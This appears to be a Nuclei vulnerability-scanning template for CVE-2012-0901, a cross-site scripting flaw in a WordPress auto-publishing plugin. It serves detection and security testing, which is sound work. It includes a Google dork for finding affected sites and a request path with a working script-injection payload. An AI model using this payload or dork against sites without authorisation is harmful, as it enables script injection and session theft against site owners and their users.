id: CVE-2012-0901 info: name: YouSayToo auto-publishing 1.0 - Cross-Site Scripting author: daffainfo severity: medium description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-0901 - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-0901 cwe-id: CWE-79 epss-score: 0.00223 epss-percentile: 0.60514 cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: attenzione product: yousaytoo google-query: "inurl:\"/wp-content/plugins/yousaytoo-auto-publishing-plugin\"" tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione flow: http(1) && http(2) http: - method: GET path: - '{{BaseURL}}' matchers: - type: word internal: true words: - '/wp-content/plugins/yousaytoo-auto-publishing-plugin/' - method: GET path: - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100a6fd6920f74970c98524bd8c651ad2bfe51d737265c753018e90239927092d5602210095be05e1174dcc1fabe44d3f68fe3f19026ddf9d8d6a66b9246fd64b1e5a0f6d:922c64590222798bb761d5b6d8e72950